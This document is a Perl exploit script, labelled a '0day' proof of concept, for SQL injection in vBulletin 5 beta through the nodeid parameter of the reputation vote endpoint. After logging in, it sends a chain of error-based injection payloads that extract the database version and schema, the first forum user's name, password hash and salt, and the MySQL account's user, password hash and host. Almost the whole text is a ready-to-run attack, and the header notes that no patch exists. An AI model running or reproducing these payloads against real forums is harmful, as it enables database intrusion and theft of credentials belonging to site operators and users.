vBulletin 5.0.0 Beta 28: 0day

1. #!/usr/bin/perl
2. ###################################################################################
3. #                                                           Satuday, March 30, 2013
4. #
5. #
6. #
7. #                    _  _  .__                .__              
8. #                 __| || |_|  |   ____   ____ |__| ____   ____  
9. #                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \
10. #                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
11. #                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
12. #                   |_||_|           \/_____/                \/
13. #                                    http://www.zempirians.com
14. #
15. #          00100011 01101100 01100101 01100111 01101001 01101111 01101110
16. #
17. #
18. #      
19. #                       [P]roof [o]f [C]oncept, SQL Injection
20. #     vBulletinâ„¢ is the world leader in forum and community publishing software.
21. #
22. #
23. #
24. ###################################################################################
25. #                                                           #      T E A M        #
26. #                                                           #######################
27. #
28. # UberLame .......> Provided all proper payloads
29. # Stealth ........> Thanks ;)
30. #
31. ###################################################################################
32. #  SUMMARY     #
33. ################
34. #
35. # http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
36. #
37. # Database error in vBulletin 5.0.0 Beta 28:
38. # MySQL Error   : Duplicate entry '#5.1.67#1' for key 'group_key'
39. # Error Number  : 1062
40. # Request Date  : Saturday, March 30th 2013 @ 01:13:40 AM
41. # Error Date    : Saturday, March 30th 2013 @ 01:13:41 AM
42. # Script        : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
43. #
44. ################
45. #  VULNERABLE  #
46. ################
47. #
48. #  vBulletin 5 beta [ALL] - http://vbulletin.com
49. #
50. ################
51. #  CONFIRMED   #
52. ################
53. #
54. #  vBulletin 5 beta 17
55. #  vBulletin 5 beta 28
56. #
57. ################
58. #  CVE         #
59. ################
60. #
61. #  There is no CVE reported.
62. #
63. ################
64. #  PATCH       #
65. ################
66. #
67. #  There is no PATCH available.
68. #
69. ###################################################################################
70. #                          #                     #
71. #                          #    H O W - T O      #
72. #                          #                     #
73. #                          #######################
74. #
75. # Provide the Target: Server, Folder, User, Password, Number and the script will
76. # login and deliver the payload...
77. #
78. # [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
79. #
80. ###################################################################################
81. use LWP::UserAgent;
82. use HTTP::Cookies;
83. use HTTP::Request::Common;
84. use MIME::Base64;
85. system $^O eq 'MSWin32' ? 'cls' : 'clear';
86. print "
87. ###############################################################################
88. #'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
89. #..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
90. #:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
91. #::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
92. #:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
93. #: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
94. # ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
95. #........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
96. ###############################################################################
97.  
98. [?] Homepage: http://www.zempirians.com
99. [?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
100. [?] Effected: vBulletin 5 Beta XX SQLi 0day
101. [?] Irc Server: irc.zempirians.com +6697
102.  
103. ";
104. if (@ARGV != 5) {
105.     print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
106.     print "\r\n";
107.     exit;
108. }
109. $host        = $ARGV[0];
110. $path        = $ARGV[1];
111. $username    = $ARGV[2];
112. $password    = $ARGV[3];
113. $magicnum    = $ARGV[4];
114. $encpath     = encode_base64('http://'.$host.$path);
115.  
116. print "\n";
117. print "[+] Establishing connection and logging in\n";
118.  
119. my $browser = LWP::UserAgent->new;
120. my $cookie_jar = HTTP::Cookies->new;
121.  
122. my $response = $browser->post( 'http://'.$host.$path.'auth/login',
123.     [
124.         'url' => $encpath,
125.         'username' => $username,
126.         'password' => $password,
127.     ],
128.     Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
129.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
130. );
131.  
132. $browser->cookie_jar( $cookie_jar );
133.  
134. print "[+] Send payload [ 1 of 4 ]\n";
135. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
136.     [
137.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
138.     ],
139.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
140. );
141. $dataA = $response->content;
142.     if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
143.                 $fixversion = $1;
144.                 $fixversion =~ s/\#//g;
145.                 $fixvb = substr($dataA, 58, 23);
146.     };
147.  
148. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
149.     [
150.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
151.     ],
152.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
153. );
154. $dataAB = $response->content;
155.         if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
156.                 $fixvbdb = $1;
157.                 $fixvbdb =~ s/\#//g;
158.         };
159.  
160.  
161. print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
162. print "\n";
163.  
164. print "[+] Send payload [ 2 of 4 ]\n";
165. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
166.     [
167.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
168.     ],
169.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
170. );
171. $dataB = $response->content;
172.     if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
173.         $fixuserhost = $1;
174.         $fixuserhost =~ s/\#//g;
175.         print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
176.     };
177. print "\n";
178.  
179. print "[+] Send payload [ 3 of 4 ]\n";
180.  
181. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
182.     [
183.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
184.     ],
185.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
186. );
187.  
188. $dataC = $response->content;
189.         if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
190.                 $fixvbuser = $1;
191.                 $fixvbuser =~ s/\#//g;
192.     };
193.  
194.  
195. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
196.     [
197.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
198.     ],
199.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
200. );
201.  
202. $dataD = $response->content;
203.         if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
204.                 $fixvbpass = $1;
205.                 $fixvbpass =~ s/\#//g;
206.         };
207.  
208.  
209. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
210.     [
211.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
212.     ],
213.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
214. );
215.  
216. $dataE = $response->content;
217.         if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
218.                 $fixvbsalt = $1;
219.                 $fixvbsalt =~ s/\#//g;
220.         };
221.  
222.  
223. print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
224. print "\n";
225.  
226. print "[+] Send payload [ 4 of 4 ]\n";
227.  
228. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
229.     [
230.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
231.     ],
232.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
233. );
234.  
235. $dataF = $response->content;
236.         if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
237.                 $fixsqluser = $1;
238.                 $fixsqluser =~ s/\#//g;
239.         };
240.  
241. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
242.     [
243.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
244.     ],
245.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
246. );
247.  
248. $dataG = $response->content;
249.         if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
250.                 $fixsqlpass = $1;
251.                 $fixsqlpass =~ s/\#//g;
252.         };
253.  
254. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
255.     [
256.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
257.     ],
258.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
259. );
260.  
261. $dataH = $response->content;
262.         if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
263.                 $fixsqlhost = $1;
264.                 $fixsqlhost =~ s/\#//g;
265.         };
266.  
267.  
268. print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';
269.  
270. #print "\n\n[?] Error dump - payload 1\n\n";
271. #print $dataAB;
272.  
273. print "\n\n";
274.  
275. exit 1;